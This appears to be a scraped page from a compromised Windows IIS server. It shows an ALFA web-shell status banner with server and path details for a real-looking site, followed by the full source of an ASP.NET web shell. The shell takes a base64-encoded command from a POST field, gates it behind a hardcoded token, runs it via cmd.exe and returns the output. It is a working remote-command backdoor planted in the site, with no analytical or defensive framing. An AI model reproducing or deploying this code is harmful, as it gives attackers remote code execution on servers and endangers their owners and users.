| Server IP : 172.67.214.117 / Your IP : 172.69.214.235 Web Server : Microsoft-IIS/10.0 System : Windows NT WAVE 10.0 build 20348 (Windows Server 2016) AMD64 User : IWPD_458(indias) ( 0) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : D:/inetpub/vhosts/indiasmartbazaar.com/pimsharyana.in/admin/shining/1337_DATA/alfacgiapi/ |
Upload File : |
<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%
string cmd = Request.Form["cmd"];
string check = Request.Form["check"];
if(check == "W3NvbGV2aXNpYmxlfmFwaV0="){
byte[] data = System.Convert.FromBase64String(cmd);
cmd = System.Text.ASCIIEncoding.ASCII.GetString(data);
Process p = new Process();
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + cmd;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.WorkingDirectory = "/";
p.Start();
string output = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
Response.Write("[solevisible~api]<pre>"+output+"</pre>");
}
%>